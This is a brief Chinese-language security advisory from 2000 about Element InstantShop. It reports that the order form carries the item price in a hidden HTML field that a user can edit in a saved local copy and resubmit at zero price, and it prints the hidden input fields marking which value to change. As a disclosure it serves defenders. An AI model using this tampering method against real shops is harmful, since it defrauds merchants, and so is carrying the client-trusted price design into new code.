在Element InstantShop中可以修改价格发布时间:2000-10-25 更新时间:2000-10-25 严重程度:中 威胁程度:远程非授权文件存取 错误类型:设计错误 利用方式:服务器模式 受影响系统 Element InstantShop详细描述 在Element InstantShop中的定单表格中可以修改物品的单位价格来发送,通过 保存一个本地COPY和修改值就可以发送0单位的价格。其中Element InstantShop 可以www.element.be查看。 <INPUT TYPE = HIDDEN NAME = "product" VALUE = "blah-blah"> <INPUT TYPE = HIDDEN NAME = "name" VALUE = "blah-blah" > <INPUT TYPE = HIDDEN NAME = "price" VALUE = "1"> --> 改变上面的值 <INPUT TYPE = HIDDEN NAME = "weight" VALUE = "1"> <INPUT TYPE = HIDDEN NAME = "shopperid" VALUE = ""> <INPUT TYPE = HIDDEN NAME = "departement" VALUE = "11"> <INPUT TYPE = HIDDEN NAME = "index" VALUE = "1"> 测试代码 见描述部分。 解决方案 尚无 相关信息 |
